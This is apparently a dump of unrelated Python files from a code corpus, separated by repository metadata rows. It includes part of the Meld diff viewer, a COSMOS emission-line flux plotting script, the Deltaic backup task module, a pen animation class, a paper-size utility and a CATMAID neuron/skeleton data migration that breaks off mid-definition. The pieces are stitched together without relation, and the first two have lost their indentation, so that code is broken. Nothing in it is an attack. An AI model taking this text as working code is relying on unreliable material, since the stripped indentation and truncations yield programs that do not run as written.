w.setup(scroll, coords_iter(i), colour_map)
for (w, i) in zip(self.linkmap, (0, self.num_panes - 2)):
w.associate(self, self.textview[i], self.textview[i + 1])
for i in range(self.num_panes):
if self.bufferdata[i].modified:
self.statusimage[i].show()
self.queue_draw()
self.recompute_label()
def next_diff(self, direction):
pane = self._get_focused_pane()
if pane == -1:
if len(self.textview) > 1:
pane = 1
else:
pane = 0
buf = self.textbuffer[pane]
if direction == gtk.gdk.SCROLL_DOWN:
target = self.cursor.next
else: # direction == gtk.gdk.SCROLL_UP
target = self.cursor.prev
if target is None:
return
c = self.linediffer.get_chunk(target, pane)
if c:
# Warp the cursor to the first line of next chunk
if self.cursor.line != c[1]:
buf.place_cursor(buf.get_iter_at_line(c[1]))
self.textview[pane].scroll_to_mark(buf.get_insert(), 0.1)
def copy_chunk(self, src, dst, chunk, copy_up):
b0, b1 = self.textbuffer[src], self.textbuffer[dst]
start = get_iter_at_line_or_eof(b0, chunk[1])
end = get_iter_at_line_or_eof(b0, chunk[2])
t0 = unicode(b0.get_text(start, end, False), 'utf8')
if copy_up:
if chunk[2] >= b0.get_line_count() and \
chunk[3] < b1.get_line_count():
# TODO: We need to insert a linebreak here, but there is no
# way to be certain what kind of linebreak to use.
t0 = t0 + "\n"
dst_start = get_iter_at_line_or_eof(b1, chunk[3])
mark0 = b1.create_mark(None, dst_start, True)
new_end = buffer_insert(b1, chunk[3], t0)
else: # copy down
dst_start = get_iter_at_line_or_eof(b1, chunk[4])
mark0 = b1.create_mark(None, dst_start, True)
new_end = buffer_insert(b1, chunk[4], t0)
mark1 = b1.create_mark(None, new_end, True)
# FIXME: If the inserted chunk ends up being an insert chunk, then
# this animation is not visible; this happens often in three-way diffs
rgba0 = self.fill_colors['insert'] + (1.0,)
rgba1 = self.fill_colors['insert'] + (0.0,)
anim = TextviewLineAnimation(mark0, mark1, rgba0, rgba1, 0.5)
self.animating_chunks[dst].append(anim)
def replace_chunk(self, src, dst, chunk):
b0, b1 = self.textbuffer[src], self.textbuffer[dst]
src_start = get_iter_at_line_or_eof(b0, chunk[1])
src_end = get_iter_at_line_or_eof(b0, chunk[2])
dst_start = get_iter_at_line_or_eof(b1, chunk[3])
dst_end = get_iter_at_line_or_eof(b1, chunk[4])
t0 = unicode(b0.get_text(src_start, src_end, False), 'utf8')
mark0 = b1.create_mark(None, dst_start, True)
self.on_textbuffer__begin_user_action()
b1.delete(dst_start, dst_end)
new_end = buffer_insert(b1, chunk[3], t0)
self.on_textbuffer__end_user_action()
mark1 = b1.create_mark(None, new_end, True)
# FIXME: If the inserted chunk ends up being an insert chunk, then
# this animation is not visible; this happens often in three-way diffs
rgba0 = self.fill_colors['insert'] + (1.0,)
rgba1 = self.fill_colors['insert'] + (0.0,)
anim = TextviewLineAnimation(mark0, mark1, rgba0, rgba1, 0.5)
self.animating_chunks[dst].append(anim)
def delete_chunk(self, src, chunk):
b0 = self.textbuffer[src]
it = get_iter_at_line_or_eof(b0, chunk[1])
if chunk[2] >= b0.get_line_count():
it.backward_char()
b0.delete(it, get_iter_at_line_or_eof(b0, chunk[2]))
mark0 = b0.create_mark(None, it, True)
mark1 = b0.create_mark(None, it, True)
# TODO: Need a more specific colour here; conflict is wrong
rgba0 = self.fill_colors['conflict'] + (1.0,)
rgba1 = self.fill_colors['conflict'] + (0.0,)
anim = TextviewLineAnimation(mark0, mark1, rgba0, rgba1, 0.5)
self.animating_chunks[src].append(anim)
################################################################################
#
# Local Functions
#
################################################################################
class MeldBufferData(object):
__slots__ = ("modified", "writable", "filename", "savefile", "label",
"encoding", "newlines")
def __init__(self, filename=None):
self.modified = 0
self.writable = 1
self.filename = filename
self.savefile = None
self.label = filename
self.encoding = None
self.newlines = None
class BufferAction(object):
"""A helper to undo/redo text insertion/deletion into/from a text buffer"""
def __init__(self, buf, offset, text):
self.buffer = buf
self.offset = offset
self.text = text
def delete(self):
start = self.buffer.get_iter_at_offset(self.offset)
end = self.buffer.get_iter_at_offset(self.offset + len(self.text))
self.buffer.delete(start, end)
def insert(self):
start = self.buffer.get_iter_at_offset(self.offset)
self.buffer.insert(start, self.text)
class BufferInsertionAction(BufferAction):
undo = BufferAction.delete
redo = BufferAction.insert
class BufferDeletionAction(BufferAction):
undo = BufferAction.insert
redo = BufferAction.delete
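# Illustrative use of the undo helpers above (the buffer, offset and text are
# hypothetical, not part of this module):
#   action = BufferInsertionAction(buf, 10, u"hello")
#   action.undo()   # removes the inserted text (BufferAction.delete)
#   action.redo()   # re-inserts it at the same offset (BufferAction.insert)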
| gpl-2.0 | -8,771,073,025,037,235,000 | 43.110922 | 196 | 0.56126 | false | 3.72303 | false | false | false |
brianlorenz/COSMOS_IMACS_Redshifts | PlotCodes/Plot_2_lines.py | 1 | 2780 | import numpy as np
import matplotlib.pyplot as plt
from astropy.io import ascii
import sys, os, string
import pandas as pd
from astropy.io import fits
import collections
#Folder to save the figures
figout = '/Users/blorenz/COSMOS/Reports/2018/Images/'
#The location with the file for all of our data
fluxdatapath = '/Users/blorenz/COSMOS/COSMOSData/lineflux.txt'
#File for the MAD of the difference in flux of duplicates in each line
maddatapath = '/Users/blorenz/COSMOS/COSMOSData/linemad.txt'
#Merge our data with the UVISTA catalog
#The location of the muzzin et al data:
mdatapath = '/Users/blorenz/COSMOS/muzzin_data/UVISTA_final_colors_sfrs_v4.1.dat'
#Read in the mad of the lines
mad_df = ascii.read(maddatapath).to_pandas()
#Read the datafile:
fluxdata = ascii.read(fluxdatapath).to_pandas()
#Fontsizes for plotting
axisfont = 18
ticksize = 16
titlefont = 24
legendfont = 16
textfont = 16
#Division function
def divz(X,Y):
return X/np.where(Y,Y,Y+1)*np.not_equal(Y,0)
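# Quick illustration of divz (hypothetical arrays, not part of the analysis):
#   divz(np.array([1.0, 2.0]), np.array([0.0, 4.0])) -> array([0. , 0.5])
# i.e. elements with a zero denominator yield 0 instead of a divide-by-zero.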
#Plot the flux of one emission line against another, for the two lines given on the command line
l1 = sys.argv[1]
l2 = sys.argv[2]
sig = int(sys.argv[3])
minlim= 0.005
maxlim= 1000
lines = [l1,l2]
def findgoodfits(pd_df=fluxdata,lines=lines,sig=sig):
goodidxs = [(pd_df[line+'_flag'] == 0) for line in lines]
lowidxs = [(divz(pd_df[line+'_flux'],pd_df[line+'_scale']) < sig*mad_df[line+'_mad'][0]) for line in lines]
goodidx = np.logical_and.reduce(goodidxs)
lowidx = np.logical_or.reduce(lowidxs)
badflux = pd_df[np.logical_not(goodidx)]
lowflux = pd_df[np.logical_and(goodidx,lowidx)]
goodflux = pd_df[np.logical_and(goodidx,np.logical_not(lowidx))]
return goodflux,lowflux,badflux
goodflux,lowflux,badflux = findgoodfits()
yerr = mad_df[l2+'_mad'][0]
xerr = mad_df[l1+'_mad'][0]
xdata = divz(goodflux[l1+'_flux'],goodflux[l1+'_scale'])
ydata = divz(goodflux[l2+'_flux'],goodflux[l2+'_scale'])
xdatalow = divz(lowflux[l1+'_flux'],lowflux[l1+'_scale'])
ydatalow = divz(lowflux[l2+'_flux'],lowflux[l2+'_scale'])
lw=0.25
mark='.'
ms=6
fig,ax = plt.subplots(figsize=(8,7))
ax.errorbar(xdatalow,ydatalow,xerr=xerr,yerr=yerr,ls='None',lw=lw,ms=ms,color='grey',marker=mark)
ax.errorbar(xdata,ydata,xerr=xerr,yerr=yerr,ls='None',lw=lw,color='blue',ms=ms,marker=mark)
ax.plot((0,1000),(0,1000),color='black',ls='--')
#Titles, axes, legends
ax.set_title(l2+ ' Flux vs ' + l1 + ' Flux',fontsize = titlefont)
ax.legend(fontsize = legendfont)
ax.set_xlabel(l1 +' Flux ($10^{-17}$ erg/s/$cm^2$)',fontsize = axisfont)
ax.set_ylabel(l2 + ' Flux ($10^{-17}$ erg/s/$cm^2$)',fontsize = axisfont)
ax.set_xscale("log")
ax.set_yscale("log")
ax.set_xlim(minlim,maxlim)
ax.set_ylim(minlim,maxlim)
ax.tick_params(labelsize = ticksize)
plt.show()
fig.savefig(figout + 'Flux_' + l2 + '_' + l1 + '.pdf')
plt.close(fig)
| mit | -4,506,119,063,836,019,700 | 28.263158 | 111 | 0.699281 | false | 2.477718 | false | false | false |
cmusatyalab/deltaic | deltaic/sources/__init__.py | 1 | 6246 | #
# Deltaic - an efficient backup system supporting multiple data sources
#
# Copyright (c) 2014 Carnegie Mellon University
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of version 2 of the GNU General Public License as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
from datetime import datetime, date
import os
import Queue
import subprocess
import sys
from threading import Thread
from ..command import get_cmdline_for_subcommand
from ..util import make_dir_path
class Unit(object):
def __init__(self):
self.root = None
self.backup_args = None
def __str__(self):
return self.root
class Task(object):
DATE_FMT = '%Y%m%d'
LOG_EXCERPT_INPUT_BYTES = 8192
LOG_EXCERPT_MAX_BYTES = 4096
LOG_EXCERPT_MAX_LINES = 10
def __init__(self, thread_count, units):
self._queue = Queue.Queue()
for unit in units:
self._queue.put(unit)
self._success = True
self._threads = [Thread(target=self._worker)
for i in range(thread_count)]
def start(self):
for thread in self._threads:
thread.start()
def _worker(self):
while True:
try:
unit = self._queue.get_nowait()
except Queue.Empty:
return
try:
if not self._execute(unit):
self._success = False
except:
self._success = False
raise
def _execute(self, unit):
raise NotImplementedError
def wait(self):
for thread in self._threads:
thread.join()
return self._success
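    # A minimal sketch of how a Task subclass is driven (the subclass name and
    # unit values here are hypothetical, not part of this module):
    #
    #   class EchoTask(Task):
    #       def _execute(self, unit):
    #           print(unit)
    #           return True
    #
    #   task = EchoTask(thread_count=2, units=['a', 'b', 'c'])
    #   task.start()
    #   ok = task.wait()   # False if any unit failed or raised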
def _run_subcommand(self, name, args, log_dir):
log_base = os.path.join(log_dir, date.today().strftime(self.DATE_FMT))
timestamp = lambda: datetime.now().strftime('%Y-%m-%d %H:%M:%S')
sys.stdout.write('Starting %s\n' % name)
command = get_cmdline_for_subcommand(args)
with open('/dev/null', 'r+') as null:
with open(log_base + '.err', 'a') as err:
with open(log_base + '.out', 'a') as out:
for fh in out, err:
fh.write('# Starting task at %s\n' % timestamp())
fh.write('# %s\n' % ' '.join(command))
fh.flush()
ret = subprocess.call(command, stdin=null, stdout=out,
stderr=err, close_fds=True)
for fh in out, err:
if ret < 0:
fh.write('# Task died on signal %d\n' % -ret)
else:
fh.write('# Task exited with status %d\n' % ret)
fh.write('# Ending task at %s\n\n' % timestamp())
if ret:
with open(log_base + '.err') as err:
# Read LOG_EXCERPT_INPUT_BYTES
err.seek(0, 2)
start = max(0, err.tell() - self.LOG_EXCERPT_INPUT_BYTES)
err.seek(start)
excerpt = err.read(self.LOG_EXCERPT_INPUT_BYTES).strip()
truncated = start > 0
# Drop exception backtraces
accept = True
excerpt_lines = []
for line in excerpt.split('\n'):
if accept:
if line == 'Traceback (most recent call last):':
accept = False
else:
excerpt_lines.append(line)
elif not line.startswith(' '):
accept = True
excerpt_lines.append(line)
# Reduce to LOG_EXCERPT_MAX_BYTES
excerpt = '\n'.join(excerpt_lines)
if len(excerpt) > self.LOG_EXCERPT_MAX_BYTES:
excerpt = excerpt[-self.LOG_EXCERPT_MAX_BYTES:]
truncated = True
# Reduce to LOG_EXCERPT_MAX_LINES
excerpt_lines = excerpt.split('\n')
if len(excerpt_lines) > self.LOG_EXCERPT_MAX_LINES:
excerpt_lines = excerpt_lines[-self.LOG_EXCERPT_MAX_LINES:]
truncated = True
# Add truncation indicator
if truncated:
excerpt_lines.insert(0, '[...]')
# Serialize
excerpt = '\n'.join(' ' * 3 + l for l in excerpt_lines)
sys.stderr.write('Failed: %s\n %s\n%s\n' % (name,
' '.join(command), excerpt))
sys.stdout.write('Ending %s\n' % name)
return ret == 0
class _SourceBackupTask(Task):
def __init__(self, settings, thread_count, units):
Task.__init__(self, thread_count, units)
self._settings = settings
def _execute(self, unit):
log_dir = make_dir_path(self._settings['root'], 'Logs', unit.root)
return self._run_subcommand(unit.root, unit.backup_args, log_dir)
class Source(object):
def __init__(self, config):
self._settings = config.get('settings', {})
self._manifest = config.get(self.LABEL, {})
@classmethod
def get_sources(cls):
sources = {}
for subclass in cls.__subclasses__():
if hasattr(subclass, 'LABEL'):
sources[subclass.LABEL] = subclass
return sources
def get_units(self):
raise NotImplementedError
def get_backup_task(self):
thread_count = self._settings.get('%s-workers' % self.LABEL, 1)
return _SourceBackupTask(self._settings, thread_count,
self.get_units())
# Now import submodules that need these definitions
from . import coda, github, rbd, rgw, rsync
| gpl-2.0 | -1,964,339,124,457,846,000 | 34.691429 | 79 | 0.538585 | false | 4.032279 | false | false | false |
slobberchops/rop | art/utils/shrapnel.py | 1 | 1757 | from pen import Pen
from math import sin, cos, pi, sqrt
from random import random
class Shrapnel(Pen):
def __init__(self, matrix, motion_cycles, huedelta=0.001, saturation=1,
radius=0, decelerate=False):
self.centerx = matrix.width/2.0
self.centery = matrix.height/2.0
self.cycles = motion_cycles
self.decelerate = decelerate
# we will reset some params to sensible values in a minute, so let's
# not fuss with x, y, dx, dy now
super(Shrapnel, self).__init__(
matrix.width,
matrix.height,
0, 0, 0, 0,
huedelta=huedelta,
saturation=saturation,
radius=radius
)
super(Shrapnel, self).setBumpStrategy(self._pause, x=True, y=True)
self.reset(matrix)
def _pause(self, x=None, y=None):
self.paused = True
def reset(self, matrix):
# the furthest distance any pen will have to travel is on the diagonal
w, h = matrix.width, matrix.height
maxDimension = sqrt(w*w + h*h)
# slowest pens need to cover the distance in cycles time, but there may
# be some that go faster
velocity = maxDimension/(2.0*self.cycles) + 0.05*random()*maxDimension
angle = random()*2*pi
self.dx = velocity * sin(angle)
self.dy = velocity * cos(angle)
self.x = self.centerx
self.y = self.centery
self.paused = False
def clock(self, matrix):
super(Shrapnel, self).clock(matrix)
# optionally slow over time
# XXX: this may cause problems for larger spans?
if self.decelerate:
self.dx *= 0.99
self.dy *= 0.99
return self.paused
| gpl-3.0 | -1,175,577,868,237,285,400 | 29.293103 | 79 | 0.583381 | false | 3.738298 | false | false | false |
idmillington/papersizes | papersizes/papersize.py | 1 | 9882 | # -*- coding: utf-8 -*-
"""
Page sizes and various mechanisms for manipulating them.
"""
import math
import collections
from .units import mm, inch
# ----------------------------------------------------------------------------
# Page size tuple.
# ----------------------------------------------------------------------------
class PaperSize(collections.namedtuple('PaperSize', 'width height')):
"""The size of a piece of paper.
This class inherits from a named tuple and has an empty ``__slots__``
property, so it is immutable and inextensible. It is used, rather
than a raw (width, height) tuple, to allow additonal methods to
be defined."""
__slots__ = ()
@classmethod
def from_mm(Class, width_in_mm, height_in_mm):
"""Convert from width and height in mm into standard pts."""
return Class(width_in_mm*mm, height_in_mm*mm)
@classmethod
def from_inch(Class, width_in_inch, height_in_inch):
"""Convert from width and height in inches into standard pts."""
return Class(width_in_inch*inch, height_in_inch*inch)
@classmethod
def from_ratio(Class, width=None, height=None, ratio=1.0):
"""Create a new paper size from the given ratio and one dimension.
Arguments:
``ratio``
The ratio of the height to the width of the resulting page. So
a ratio of 1.5 (i.e. 3:2) will be 1.5x as tall as it is wide.
Note that the ``ratio`` property returns
the ratio of long to short
side, not height to width. For the same ratio, therefore, this
function will generate a paper in portrait orientation. The
``papersizes.ratios`` module provides a series of common
ratios.
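        A brief illustrative example (an arbitrary width given in points)::

            >>> PaperSize.from_ratio(width=100.0, ratio=1.5)
            PaperSize(100.000000, 150.000000)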
"""
if width is None:
if height is None:
raise ValueError('width or height must be given')
else:
                return Class(height / ratio, height)
else:
if height is None:
                return Class(width, width * ratio)
else:
raise ValueError('only one of width or height may be given')
@property
def area_in_sq_pts(self):
"""The area of this paper."""
return self.width * self.height
@property
def ratio(self):
"""The ratio of long to short side."""
if self.width > self.height:
return self.width / self.height
else:
return self.height / self.width
def landscape(self):
"""Return a version of this paper size in landscape orientation."""
if self.width >= self.height:
return self
else:
return self.flip()
def portrait(self):
"""Return a version of this paper size in portrait orientation."""
if self.width <= self.height:
return self
else:
return self.flip()
def flip(self):
"""Return a version of this paper size with dimensions reversed."""
return PaperSize(self.height, self.width)
def half(self):
"""Paper half the size of this, cut parallel to the short edge.
If the original paper is portrait, the returned paper will be also,
and vice versa.
"""
if self.height < self.width:
if self.height > self.width / 2:
return PaperSize(self.height, self.width / 2)
else:
return PaperSize(self.width / 2, self.height)
else:
if self.width > self.height / 2:
return PaperSize(self.height / 2, self.width)
else:
return PaperSize(self.width, self.height / 2)
def small_square(self):
"""Return a square paper size using the smaller dimension."""
if self.height < self.width:
return PaperSize(self.height, self.height)
elif self.height == self.width:
return self
else:
return PaperSize(self.width, self.width)
def large_square(self):
"""Return a square paper size using the larger dimension."""
if self.height > self.width:
return PaperSize(self.height, self.height)
elif self.height == self.width:
return self
else:
return PaperSize(self.width, self.width)
def round_to_mm(self):
"""Return a paper size with dimensions rounded to the nearest mm."""
return PaperSize(round(self.width / mm)*mm, round(self.height / mm)*mm)
def is_landscape(self):
"""Check if this paper is landscape oriented.
Square paper is neither landscape or portrait."""
return self.width > self.height
def is_portrait(self):
"""Check if this paper is portrait oriented.
Square paper is neither landscape or portrait."""
return self.width < self.height
def is_square(self):
"""Check if this paper is square."""
return self.width == self.height
def is_approximately(self, other, tolerance=0.1*mm):
"""Check if the given paper size is roughly the same as this one.
Arguments:
``other``
The paper size to compare against. This can be given as any
(width, height) tuple, it doesn't have to be a ``PaperSize``
instance.
"""
return abs(self.width - other[0]) <= tolerance and \
abs(self.height - other[1]) <= tolerance
def add_bleed(self, bleed):
"""Return a paper size with the given bleed added.
Standard bleeds are 3mm internationally and 1/8" US. Large images and
die cuts have a larger bleed."""
if bleed != 0.0:
return PaperSize(self.width + bleed*2.0, self.height + bleed*2.0)
else:
return self
def as_pt_str(self):
"""Printable description of the size, to the nearest point."""
return '{0:.0f}x{1:.0f}pt'.format(self.width, self.height)
def as_mm_str(self):
"""Printable description of the size, to the nearest mm."""
return '{0:.0f}x{1:.0f}mm'.format(self.width / mm, self.height / mm)
def as_inch_str(self, unit='"'):
"""Printable description of the size, to the nearest ⅛ of an inch."""
EIGHTHS = ('', '⅛', '¼', '⅜', '½', '⅝', '¾', '⅞')
        def _to_eight(val):
            # Round to the nearest eighth of an inch, carrying into the whole
            # part when the fraction rounds up to a full inch.
            eighths = round(val / inch * 8)
            whole, eighth = divmod(eighths, 8)
            return '{0:.0f}{1}'.format(whole, EIGHTHS[eighth])
return '{0}x{1}{2}'.format(
_to_eight(self.width), _to_eight(self.height), unit)
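    # For example, ISO A4 (210x297 mm) renders as 8¼x11¾" via as_inch_str().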
def __repr__(self):
return 'PaperSize({0:f}, {1:f})'.format(self.width, self.height)
def __str__(self):
return '{0} ({1}, {2})'.format(
self.as_pt_str(), self.as_mm_str(), self.as_inch_str())
# ----------------------------------------------------------------------------
# Page size generator.
# ----------------------------------------------------------------------------
class ISO269Series(object):
"""
A set of paper sizes conforming to ISO 269.
ISO 269 specifies tolerances of at least 1mm in page sizes and
these are often used to make sure that each page size is an
integer number of mm in each direction. So A4 is of width 210mm,
although A0 is 841mm wide. This breaks the normal halving rule,
but is a widespread standard.
Instances of this class can be used to retrieve paper sizes by
using subscript notation: ``A[5]``, for example. There is no limit
to the large (lower numbered) sizes that can be calculated in this
way, but because this class always rounds to the nearest millimeter,
very small paper sizes (high numbered) will be meaningless.
Paper sizes returned by this class are portrait oriented.
Arguments:
``initial_size``
The 'reference' paper size for this series. This is usually a
large size, most commonly the 0-size. This can be given as any
(width, height) tuple, it doesn't have to be a ``PaperSize``
instance.
``initial_number``
The size number of the initial paper size given in the first
argument.
"""
def __init__(self, initial_size, initial_number=0):
# We might be given a plain tuple, so don't use PaperSize.portrait
if initial_size[0] > initial_size[1]:
initial_size = initial_size[1], initial_size[0]
# Store the size internally in mm, so we can do the simplification.
initial_in_mm = round(initial_size[0] / mm), round(initial_size[1] / mm)
self.cache = {initial_number:initial_in_mm}
self.min_cached = initial_number
self.max_cached = initial_number
self.initial_size = initial_size
self.initial_number = initial_number
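    # Illustrative usage (assuming the standard A-series reference sheet):
    #   A = ISO269Series(PaperSize.from_mm(841, 1189))  # A0
    #   A[4]    -> 210mm x 297mm (A4)
    #   A[-1]   -> 1189mm x 1682mm (2A0)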
def __repr__(self):
return "ISO 269 Series, {0} at size {1}".format(
repr(self.initial_size),
repr(self.initial_number))
def __getitem__(self, size):
if size not in self.cache:
if size > self.max_cached:
# We're smaller than the last value cached.
last = self.cache[self.max_cached]
for s in range(self.max_cached+1, size+1):
next = last[1] // 2, last[0]
self.cache[s] = next
last = next
self.max_cached = size
else:
# We're larger than the initial.
last = self.cache[self.min_cached]
for s in range(self.min_cached-1, size-1, -1):
next = last[1], last[0] * 2
self.cache[s] = next
last = next
self.min_cached = size
# Cached data is in mm, so convert to pts.
return PaperSize.from_mm(*self.cache[size]) | mit | -5,493,778,113,455,439,000 | 36.245283 | 80 | 0.567332 | false | 4.059646 | false | false | false |
htem/CATMAID | django/applications/catmaid/migrations/0022_cleanup_neurons_and_skeletons.py | 4 | 49681 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
verbose_log = False
def log(msg):
print(" %s" % msg)
def logv(msg):
if verbose_log:
log(msg)
else:
return
class Migration(DataMigration):
def forwards(self, orm):
""" This migration will make sure that every neuron that exists has
exactly one skeleton linked to it. Neurons that are linked to no
skeleton will be deleted. Neurons that are linked to multiple skeletons
will be duplicated and each skeleton will be linked to one copy.
"""
# Get IDs of 'model_of' relation and 'skeleton' class for every project.
# Ignore the project, if these don't exist.
for p in orm.Project.objects.all():
log("Looking at project #%s" % p.id)
try:
model_of_rel = orm.Relation.objects.get(project=p,
relation_name='model_of')
skeleton_cls = orm.Class.objects.get(project=p,
class_name='skeleton')
neuron_cls = orm.Class.objects.get(project=p,
class_name='neuron')
except orm.Relation.DoesNotExist:
log("Project #%s doesn't have a 'model_of' relation. " \
"Ignoring it." % p.id)
continue
except orm.Class.DoesNotExist:
log("Project #%s doesn't have a 'skeleton' or 'neuron' class. " \
"Ignoring it." % p.id)
continue
# Prefetching the 'cici_via_a' and 'cici_via_b' takes unfortunately
# too much memory.
neurons = orm.ClassInstance.objects.filter(project_id=p.id,
class_column_id=neuron_cls)
log("Processing %s neurons" % len(neurons))
# Calculate percentage output marks for output every 10%
output_count = {}
for i in range(10):
output_count[i*(len(neurons)/10)] = i * 10
output_count[len(neurons) - 1] = 100
deleted_neurons = 0
cloned_neurons = 0
for i, n in enumerate(neurons):
                # Give a rough estimate of where we are
if i in output_count:
log("%s%%" % output_count[i])
# To copy all CICI links, the originals are needed
from_links = n.cici_via_a.all()
to_links = n.cici_via_b.all()
                # Skeleton links are 'to links': skeleton model_of neuron.
                # Separate them from the other 'to' links so they can be
                # redistributed among the clones created below.
skeleton_links = []
other_to_links = []
for l in to_links:
has_sk_rel = l.relation_id == model_of_rel.id
has_sk_cls = l.class_instance_a.class_column_id == skeleton_cls.id
if has_sk_rel and has_sk_cls:
skeleton_links.append(l)
else:
other_to_links.append(l)
# Get number of linked skeletons
nr_skeleton_links = len(skeleton_links)
# Delete neurons that don't have any skeleton link
if not nr_skeleton_links:
n.delete()
deleted_neurons = deleted_neurons + 1
continue
# Skip all neurons that have exactly one skeleton linked
elif nr_skeleton_links == 1:
continue
# Clone all neurons that have more than one skeleton linked and link
# one copy to one skeleton.
logv("Expanding neuron #%s into %s clones." % (n.id, nr_skeleton_links))
logv(" Original CICI (via a) link IDs: %s" % \
str([l.id for l in from_links]))
logv(" Original CICI (via b) link IDs: %s" % \
str([l.id for l in to_links]))
# Create skeleton_links - 1 clones
for k in range(nr_skeleton_links - 1):
# Django will create a new copy of the object if the primary key
# is set to None.
n.pk = None
n.save()
# Explicitly re-create links
for l in from_links:
# Clone CICI link
l.pk = None
l.class_instance_a = n
l.save()
for l in other_to_links:
# Clone CICI link
l.pk = None
l.class_instance_b = n
l.save()
                    # Get a skeleton link, delete it from the original neuron
                    # and link it to the new neuron.
skeleton_l = skeleton_links.pop()
skeleton_l.delete()
skeleton_l.pk = None
skeleton_l.class_instance_b = n
skeleton_l.save()
# Output to compare IDs
logv(" Clone #%s CICI (via a) link IDs: %s" % \
(n.id, str([l.id for l in n.cici_via_a.all()])))
logv(" Clone #%s CICI (via b) link IDs: %s" % \
(n.id, str([l.id for l in n.cici_via_b.all()])))
# Keep track of cloned neuron count
cloned_neurons = cloned_neurons + 1
action = "%s have been deleted." % deleted_neurons \
if deleted_neurons else "Nothing to delete."
log("Found %s neuron(s) that had no skeleton linked. %s" % \
(deleted_neurons, action))
action = "%s have been cloned." % cloned_neurons \
if cloned_neurons else "Nothing to do."
log("Found %s neuron(s) that had multiple skeleton linked. %s" % \
(cloned_neurons, action))
# Check if there are now only neurons with exactly one skeleton
# linked.
nr_neurons = orm.ClassInstance.objects.filter(project_id=p.id,
class_column_id=neuron_cls.id).count()
skeleton_links = orm.ClassInstanceClassInstance.objects.filter(
project_id=p.id,
class_instance_a__class_column_id=skeleton_cls.id,
class_instance_b__class_column_id=neuron_cls.id,
relation_id=model_of_rel).values('class_instance_b').annotate(
sk_count=models.Count('class_instance_a'))
for l in skeleton_links:
if l['sk_count'] != 1:
raise RuntimeError("Number of skeleton links for neurons %s ' \
'is %s instead of 1. Aborting." % l.class_instance_b)
log("Each neuron of project #%s has now exactly one skeleton " \
"linked" % p.id)
if (nr_neurons == len(skeleton_links)):
log("Number of neurons is now equal to number of skeleton links")
else:
raise RuntimeError("Number of neurons (%s) is not equal to ' \
'number of skeleton links (%s) after this migration. ' \
'Aborting." % (nr_neurons, len(skeleton_links)))
log("Done with data migration")
def backwards(self, orm):
print("This data migration cannot be reverted!")
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'catmaid.apikey': {
'Meta': {'object_name': 'ApiKey'},
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'catmaid.brokenslice': {
'Meta': {'object_name': 'BrokenSlice', 'db_table': "'broken_slice'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"})
},
'catmaid.cardinalityrestriction': {
'Meta': {'object_name': 'CardinalityRestriction', 'db_table': "'cardinality_restriction'"},
'cardinality_type': ('django.db.models.fields.IntegerField', [], {}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'restricted_link': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassClass']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'value': ('django.db.models.fields.IntegerField', [], {})
},
'catmaid.changerequest': {
'Meta': {'object_name': 'ChangeRequest', 'db_table': "'change_request'"},
'approve_action': ('django.db.models.fields.TextField', [], {}),
'completion_time': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'connector': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Connector']"}),
